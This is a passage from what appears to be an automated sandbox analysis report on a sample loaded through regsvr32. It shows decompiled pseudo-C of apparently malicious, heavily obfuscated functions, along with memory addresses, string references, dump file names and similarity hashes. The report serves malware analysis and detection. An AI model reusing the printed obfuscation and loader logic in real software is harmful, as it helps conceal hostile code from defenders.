				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t261;
				intOrPtr* _t284;
				void* _t286;
				intOrPtr _t294;
				intOrPtr* _t295;
				void* _t297;
				intOrPtr* _t299;
				void* _t301;
				void* _t325;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int* _t337;

				_t299 = _a4;
				_push(_a8);
				_t327 = __edx;
				_push(_t299);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t261);
				_v92 = 0x4ad2af;
				_t337 =  &(( &_v124)[4]);
				_v92 = _v92 << 4;
				_t325 = 0;
				_t301 = 0xeae8bd1;
				_t328 = 0x27;
				_v92 = _v92 * 0x30;
				_v92 = _v92 ^ 0xe0780d01;
				_v32 = 0x52ecdf;
				_v32 = _v32 | 0x4795fc12;
				_v32 = _v32 ^ 0x47d7fcde;
				_v40 = 0x6c24d1;
				_v40 = _v40 + 0xffffd677;
				_v40 = _v40 ^ 0x006bfb48;
				_v124 = 0xafb159;
				_v124 = _v124 + 0x853c;
				_v124 = _v124 * 0x3c;
				_v124 = _v124 + 0xffffb483;
				_v124 = _v124 ^ 0x294c7f6f;
				_v116 = 0x2e5989;
				_v116 = _v116 << 3;
				_v116 = _v116 << 0xc;
				_v116 = _v116 + 0xffff32fd;
				_v116 = _v116 ^ 0x2cc3b2fd;
				_v104 = 0xb70fe2;
				_v104 = _v104 * 0x61;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00000115;
				_v20 = 0x29c7ba;
				_v20 = _v20 / _t328;
				_v20 = _v20 ^ 0x0001123f;
				_v44 = 0xd235de;
				_t329 = 0x19;
				_v44 = _v44 * 0x34;
				_v44 = _v44 ^ 0x2ab83bf3;
				_v120 = 0x2b8a20;
				_v120 = _v120 / _t329;
				_v120 = _v120 + 0xd97b;
				_v120 = _v120 + 0x9745;
				_v120 = _v120 ^ 0x00091694;
				_v80 = 0x44ed89;
				_v80 = _v80 << 8;
				_v80 = _v80 + 0x6d47;
				_v80 = _v80 ^ 0x44e06617;
				_v84 = 0x8c3da4;
				_v84 = _v84 << 3;
				_v84 = _v84 + 0xffff28ee;
				_v84 = _v84 ^ 0x04621daf;
				_v88 = 0x7b0e01;
				_t330 = 0x2a;
				_v88 = _v88 * 0x7e;
				_v88 = _v88 / _t330;
				_v88 = _v88 ^ 0x01771ea0;
				_v48 = 0xf210e7;
				_t331 = 0x56;
				_v48 = _v48 / _t331;
				_v48 = _v48 ^ 0x000151ed;
				_v52 = 0xb85aaa;
				_v52 = _v52 ^ 0x7279f80c;
				_v52 = _v52 ^ 0x72c0fdc9;
				_v108 = 0xe210ad;
				_v108 = _v108 + 0xffffc30f;
				_v108 = _v108 ^ 0xff005d9c;
				_v108 = _v108 ^ 0x468aee4e;
				_v108 = _v108 ^ 0xb96c249f;
				_v36 = 0xf02045;
				_t332 = 0x7e;
				_v36 = _v36 * 0x7d;
				_v36 = _v36 ^ 0x753d6877;
				_v76 = 0x890c0b;
				_v76 = _v76 | 0x3fa19484;
				_v76 = _v76 + 0xc76f;
				_v76 = _v76 ^ 0x3fa932ba;
				_v112 = 0xdcee96;
				_v112 = _v112 << 0xb;
				_v112 = _v112 / _t332;
				_v112 = _v112 ^ 0x6c4d9ccb;
				_v112 = _v112 ^ 0x6d94fd95;
				_v56 = 0x741505;
				_t333 = 0x1d;
				_v56 = _v56 / _t333;
				_v56 = _v56 + 0xe34c;
				_v56 = _v56 ^ 0x00059e64;
				_v24 = 0xde7835;
				_t334 = 0x73;
				_v24 = _v24 * 7;
				_v24 = _v24 ^ 0x0614b333;
				_v28 = 0x817a7e;
				_v28 = _v28 + 0x50ff;
				_v28 = _v28 ^ 0x008db9da;
				_v60 = 0x30460f;
				_v60 = _v60 | 0x5b476089;
				_v60 = _v60 + 0x7857;
				_v60 = _v60 ^ 0x5b7b85ad;
				_v64 = 0x3287c5;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 | 0xf6bf374a;
				_v64 = _v64 ^ 0xf6be02d9;
				_v68 = 0xbf5def;
				_v68 = _v68 + 0xffff47b3;
				_v68 = _v68 + 0xffff0d11;
				_v68 = _v68 ^ 0x00bf58a8;
				_v72 = 0xc5c956;
				_v72 = _v72 ^ 0x0920ed5d;
				_v72 = _v72 / _t334;
				_v72 = _v72 ^ 0x00102287;
				_v16 = 0x6e7810;
				_v16 = _v16 + 0xffff2e79;
				_v16 = _v16 ^ 0x0061adb7;
				_v96 = 0xe3f1bb;
				_v96 = _v96 | 0x17c89f2a;
				_v96 = _v96 ^ 0x2d56d01e;
				_v96 = _v96 ^ 0x01e2669f;
				_v96 = _v96 ^ 0x3b5230bc;
				_v100 = 0x967d31;
				_v100 = _v100 | 0xebdf376e;
				_v100 = _v100 + 0x87ad;
				_v100 = _v100 ^ 0xebeed43d;
				do {
					while(_t301 != 0x242fff5) {
						if(_t301 == 0x95dc10a) {
							_push(_t301);
							_push(_t301);
							_t294 = E04B8C5D8(_v8);
							_t337 =  &(_t337[3]);
							_v12 = _t294;
							if(_t294 != 0) {
								_t301 = 0x242fff5;
								continue;
							}
						} else {
							if(_t301 == 0xb01d963) {
								_t295 =  *0x4ba6224; // 0x0
								_t297 = E04B82194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
								_t337 =  &(_t337[0xf]);
								if(_t297 == _v116) {
									_t301 = 0x95dc10a;
									continue;
								}
							} else {
								if(_t301 == 0xb93db5b) {
									E04BA2B09(_v16, _v12, _v96, _v100);
								} else {
									if(_t301 != 0xeae8bd1) {
										goto L13;
									} else {
										_t301 = 0xb01d963;
										continue;
									}
								}
							}
						}
						L17:
						return _t325;
					}
					_t284 =  *0x4ba6224; // 0x0
					_t286 = E04B82194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
					_t337 =  &(_t337[0xf]);
					if(_t286 == _v20) {
						 *_t299 = _v12;
						_t325 = 1;
						 *((intOrPtr*)(_t299 + 4)) = _v8;
					} else {
						_t301 = 0xb93db5b;
						goto L13;
					}
					goto L17;
					L13:
				} while (_t301 != 0xf5a5c60);
				goto L17;
			}

0x04b8fb92
0x04b8fb9c
0x04b8fba3
0x04b8fba5
0x04b8fba6
0x04b8fba7
0x04b8fba8
0x04b8fbad
0x04b8fbb5
0x04b8fbb8
0x04b8fbc4
0x04b8fbc6
0x04b8fbcd
0x04b8fbd0
0x04b8fbd4
0x04b8fbdc
0x04b8fbe4
0x04b8fbec
0x04b8fbf4
0x04b8fbfc
0x04b8fc04
0x04b8fc0c
0x04b8fc14
0x04b8fc21
0x04b8fc25
0x04b8fc2d
0x04b8fc35
0x04b8fc3d
0x04b8fc42
0x04b8fc47
0x04b8fc4f
0x04b8fc57
0x04b8fc64
0x04b8fc68
0x04b8fc6d
0x04b8fc72
0x04b8fc7a
0x04b8fc8a
0x04b8fc8e
0x04b8fc96
0x04b8fca3
0x04b8fca6
0x04b8fcaa
0x04b8fcb2
0x04b8fcc2
0x04b8fcc6
0x04b8fcce
0x04b8fcd6
0x04b8fcde
0x04b8fce6
0x04b8fceb
0x04b8fcf3
0x04b8fcfb
0x04b8fd03
0x04b8fd08
0x04b8fd10
0x04b8fd18
0x04b8fd25
0x04b8fd26
0x04b8fd30
0x04b8fd34
0x04b8fd3e
0x04b8fd4c
0x04b8fd51
0x04b8fd57
0x04b8fd5f
0x04b8fd67
0x04b8fd6f
0x04b8fd77
0x04b8fd7f
0x04b8fd87
0x04b8fd8f
0x04b8fd97
0x04b8fd9f
0x04b8fdac
0x04b8fdaf
0x04b8fdb3
0x04b8fdbb
0x04b8fdc3
0x04b8fdcb
0x04b8fdd3
0x04b8fddb
0x04b8fde3
0x04b8fdf0
0x04b8fdf4
0x04b8fdfc
0x04b8fe04
0x04b8fe10
0x04b8fe15
0x04b8fe1b
0x04b8fe23
0x04b8fe2b
0x04b8fe38
0x04b8fe39
0x04b8fe3d
0x04b8fe45
0x04b8fe4d
0x04b8fe55
0x04b8fe5d
0x04b8fe65
0x04b8fe6d
0x04b8fe75
0x04b8fe7d
0x04b8fe85
0x04b8fe8a
0x04b8fe92
0x04b8fe9a
0x04b8fea2
0x04b8feaa
0x04b8feb2
0x04b8feba
0x04b8fec2
0x04b8fed0
0x04b8fed4
0x04b8fedc
0x04b8fee4
0x04b8feec
0x04b8fef4
0x04b8fefc
0x04b8ff04
0x04b8ff0c
0x04b8ff14
0x04b8ff1c
0x04b8ff24
0x04b8ff31
0x04b8ff39
0x04b8ff41
0x04b8ff41
0x04b8ff4f
0x04b8ffed
0x04b8ffee
0x04b8fff6
0x04b8fffb
0x04b8fffe
0x04b90007
0x04b9000d
0x00000000
0x04b9000d
0x04b8ff55
0x04b8ff5b
0x04b8ff7c
0x04b8ffc1
0x04b8ffc6
0x04b8ffcd
0x04b8ffd3
0x00000000
0x04b8ffd3
0x04b8ff5d
0x04b8ff63
0x04b9009c
0x04b8ff69
0x04b8ff6f
0x00000000
0x04b8ff75
0x04b8ff75
0x00000000
0x04b8ff75
0x04b8ff6f
0x04b8ff63
0x04b8ff5b
0x04b900bb
0x04b900c4
0x04b900c4
0x04b9001b
0x04b90065
0x04b9006a
0x04b90071
0x04b900ae
0x04b900b0
0x04b900b8
0x04b90073
0x04b90073
0x00000000
0x04b90073
0x00000000
0x04b90078
0x04b90078
0x00000000

Strings

L, xrefs: 04B8FE1B
Wx, xrefs: 04B8FE6D
wh=u, xrefs: 04B8FDB3
] , xrefs: 04B8FEC2
Gm, xrefs: 04B8FCEB

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Gm$L$Wx$] $wh=u
API String ID: 0-1494249286
Opcode ID: d5db5c6da43739ff74c8d33d0fabd7124794c00ea7edbad40a19e0a3e9d02d73
Instruction ID: fd28ffca0f3e7434624268b8dc727a32d9840662026a68e6df1949c336753d61
Opcode Fuzzy Hash: d5db5c6da43739ff74c8d33d0fabd7124794c00ea7edbad40a19e0a3e9d02d73
Instruction Fuzzy Hash: 92D11E724093809FD768CF66C88991BFBF2FB89748F10891DF29586260D7B29949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B98D3D, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B98D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0x4ba6208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E04B8C5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0x4ba6208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E04B90EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E04BA36AA);
								_t155 =  *0x4ba6208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E04B848DD(_v32, _v48, _v52);
					_t155 =  *0x4ba6208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}

0x04b98d3d
0x04b98d40
0x04b98d47
0x04b98d4f
0x04b98d57
0x04b98d5f
0x04b98d67
0x04b98d6f
0x04b98d77
0x04b98d7f
0x04b98d84
0x04b98d8c
0x04b98d94
0x04b98d99
0x04b98dab
0x04b98db5
0x04b98db9
0x04b98dbb
0x04b98dc3
0x04b98dd1
0x04b98dd6
0x04b98dda
0x04b98de2
0x04b98dea
0x04b98df2
0x04b98dfa
0x04b98dff
0x04b98e07
0x04b98e0f
0x04b98e17
0x04b98e22
0x04b98e27
0x04b98e31
0x04b98e36
0x04b98e3a
0x04b98e42
0x04b98e4a
0x04b98e52
0x04b98e5a
0x04b98e5f
0x04b98e67
0x04b98e6f
0x04b98e7f
0x04b98e85
0x04b98e8d
0x04b98e95
0x04b98e9d
0x04b98ea1
0x04b98ea2
0x04b98ea4
0x04b98ea8
0x04b98eb0
0x04b98eb5
0x04b98ebd
0x04b98ec5
0x04b98ecd
0x04b98ed5
0x04b98ee2
0x04b98eef
0x04b98ef7
0x04b98eff
0x04b98f07
0x04b98f0d
0x04b98f0d
0x04b98f13
0x04b98f66
0x04b98f67
0x04b98f6f
0x04b98f71
0x04b98f74
0x04b98f7a
0x00000000
0x04b98f15
0x04b98f17
0x00000000
0x04b98f1d
0x04b98f37
0x04b98f3c
0x04b98f45
0x04b98f45
0x04b98f17
0x04b98f48
0x04b98f55
0x04b98f55
0x04b98f85
0x04b98f8d
0x04b98f92
0x04b98f98
0x04b98f9b
0x04b98f9d
0x04b98fa0
0x04b98fa0
0x00000000

Strings

_, xrefs: 04B98EB5
|Y+, xrefs: 04B98D4F
#, xrefs: 04B98E85
7S, xrefs: 04B98E4A
^M, xrefs: 04B98EC5

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #$ _$7S$^M$|Y+
API String ID: 0-3744723356
Opcode ID: 6961d2f812e9c56c51ba2d3f5b9dc16e6b44dc231f8eb6f5ab928e10188c160b
Instruction ID: 0c91d56a830ecbe31b58e418fd3f4b90ab2acfe8440759408598faefa5933325
Opcode Fuzzy Hash: 6961d2f812e9c56c51ba2d3f5b9dc16e6b44dc231f8eb6f5ab928e10188c160b
Instruction Fuzzy Hash: F35145719083419FD748DF25D48A50BBBE1FBC8768F048E1DF099A6260D3B99E49CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 100126F9, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100126F9(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100122B0(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x100126fd
0x100126ff
0x10012701
0x10012705
0x10012707
0x1001273c
0x10012746
0x10012748
0x1001274f
0x1001274f
0x00000000
0x10012755
0x1001270e
0x1001271b
0x10012723
0x00000000
0x00000000
0x10012727
0x1001272d
0x10012731
0x1001273a
0x00000000
0x1001273a
0x1001275b

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF59, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FF59(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E10012862(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E1000A7CE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000ff5c
0x1000ff68
0x1000ffb0
0x1000ffb2
0x1000ffb9
0x00000000
0x1000ffbb
0x1000ff6f
0x1000ff73
0x00000000
0x00000000
0x1000ff75
0x1000ff82
0x00000000
0x1000ff96
0x1000ffa5
0x00000000
0x1000ffad

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetKeyState.USER32 ref: 1000FF7D
GetKeyState.USER32 ref: 1000FF86
GetKeyState.USER32 ref: 1000FF8F
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 1000FFA5

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271

Uniqueness

Uniqueness Score: -1.00%

Function 04B9437A, Relevance: 5.4, Strings: 4, Instructions: 412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E04B9437A(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				intOrPtr _v168;
				char _v228;
				short _v772;
				short _v774;
				char _v776;
				signed int _v820;
				char _v1340;
				char _v1860;
				void* _t400;
				signed int _t441;
				signed int _t445;
				intOrPtr _t447;
				intOrPtr _t458;
				void* _t460;
				void* _t508;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				intOrPtr* _t534;
				void* _t537;
				void* _t538;

				_t458 = _a24;
				_push(_t458);
				_push(_a20);
				_t534 = __ecx;
				_push(_a16);
				_v156 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t400);
				_v152 = 0x1ee029;
				_t538 = _t537 + 0x20;
				_t460 = 0xf0aa094;
				_t519 = 0x59;
				_v152 = _v152 * 0x53;
				_v152 = _v152 ^ 0x0a02ad5b;
				_v120 = 0x2e5311;
				_v120 = _v120 ^ 0xe660d2f8;
				_v120 = _v120 ^ 0xe649fc28;
				_v80 = 0x91358;
				_v80 = _v80 * 0x29;
				_v80 = _v80 | 0x1917a6d7;
				_v80 = _v80 ^ 0x197ed78c;
				_v96 = 0x864d8a;
				_v96 = _v96 * 0x68;
				_v96 = _v96 / _t519;
				_v96 = _v96 ^ 0x00977d81;
				_v104 = 0x73430f;
				_t520 = 0x22;
				_v104 = _v104 / _t520;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x01b21e30;
				_v128 = 0x2ef155;
				_t521 = 0xc;
				_v128 = _v128 / _t521;
				_v128 = _v128 ^ 0x0005732d;
				_v12 = 0x61311f;
				_t522 = 0x51;
				_v12 = _v12 / _t522;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x00018224;
				_v112 = 0x2a9ecd;
				_v112 = _v112 << 8;
				_v112 = _v112 + 0x4b18;
				_v112 = _v112 ^ 0x2a91adfb;
				_v44 = 0x8c67a3;
				_v44 = _v44 + 0xbf2c;
				_t523 = 0x1a;
				_v44 = _v44 / _t523;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x56d2d87d;
				_v20 = 0xb2272e;
				_t524 = 0x6b;
				_v20 = _v20 / _t524;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xffffd823;
				_v20 = _v20 ^ 0x003105de;
				_v144 = 0x2b3b33;
				_t525 = 0x2b;
				_v144 = _v144 * 0x23;
				_v144 = _v144 ^ 0x05e29440;
				_v52 = 0xfb7274;
				_v52 = _v52 + 0xffff2a15;
				_v52 = _v52 + 0xffff332b;
				_v52 = _v52 >> 9;
				_v52 = _v52 ^ 0x000fdf14;
				_v88 = 0xc646f0;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0xffff0542;
				_v88 = _v88 ^ 0x0060230d;
				_v136 = 0x21355;
				_v136 = _v136 + 0x6ddd;
				_v136 = _v136 ^ 0x000c09c4;
				_v148 = 0xba736e;
				_v148 = _v148 + 0xffff584e;
				_v148 = _v148 ^ 0x00bc780c;
				_v72 = 0xf06361;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0xd5eeb61d;
				_v72 = _v72 ^ 0xd5e3ba03;
				_v68 = 0x39c1e1;
				_v68 = _v68 / _t525;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x157dcab9;
				_v28 = 0x7b1c58;
				_v28 = _v28 + 0x44f9;
				_v28 = _v28 + 0xe0d1;
				_v28 = _v28 | 0x2c17f99e;
				_v28 = _v28 ^ 0x2c795b23;
				_v8 = 0x6811e0;
				_t526 = 0x7d;
				_v8 = _v8 / _t526;
				_t527 = 0x6c;
				_v8 = _v8 / _t527;
				_t528 = 6;
				_v8 = _v8 / _t528;
				_v8 = _v8 ^ 0x00012ce9;
				_v84 = 0x1c9c1b;
				_v84 = _v84 ^ 0x05ddd281;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x002853b0;
				_v76 = 0xb1555b;
				_v76 = _v76 << 7;
				_v76 = _v76 * 0x47;
				_v76 = _v76 ^ 0x9758833c;
				_v36 = 0x114b6d;
				_v36 = _v36 ^ 0x431dffba;
				_v36 = _v36 >> 3;
				_v36 = _v36 + 0x181d;
				_v36 = _v36 ^ 0x086a5704;
				_v60 = 0xa17b63;
				_v60 = _v60 ^ 0x190e6497;
				_v60 = _v60 ^ 0xa9f7cd41;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0xb1a3277b;
				_v24 = 0xc713d;
				_v24 = _v24 + 0xc399;
				_v24 = _v24 << 4;
				_v24 = _v24 + 0xfffffd24;
				_v24 = _v24 ^ 0x00d339a4;
				_v16 = 0xef5337;
				_t529 = 0x2b;
				_v16 = _v16 / _t529;
				_v16 = _v16 | 0x2bad32d2;
				_v16 = _v16 + 0xfffffea2;
				_v16 = _v16 ^ 0x2bafb8a8;
				_v100 = 0x51ad29;
				_v100 = _v100 << 0xd;
				_v100 = _v100 ^ 0x8b9fc663;
				_v100 = _v100 ^ 0xbe3a4459;
				_v92 = 0x2bdd9f;
				_t530 = 0x14;
				_v92 = _v92 / _t530;
				_v92 = _v92 + 0xffff92be;
				_v92 = _v92 ^ 0x000ebd35;
				_v140 = 0x9e48cc;
				_v140 = _v140 << 0xd;
				_v140 = _v140 ^ 0xc915160c;
				_v108 = 0xd84d8a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x0004338e;
				_v40 = 0xc226eb;
				_v40 = _v40 << 2;
				_v40 = _v40 + 0xfffff267;
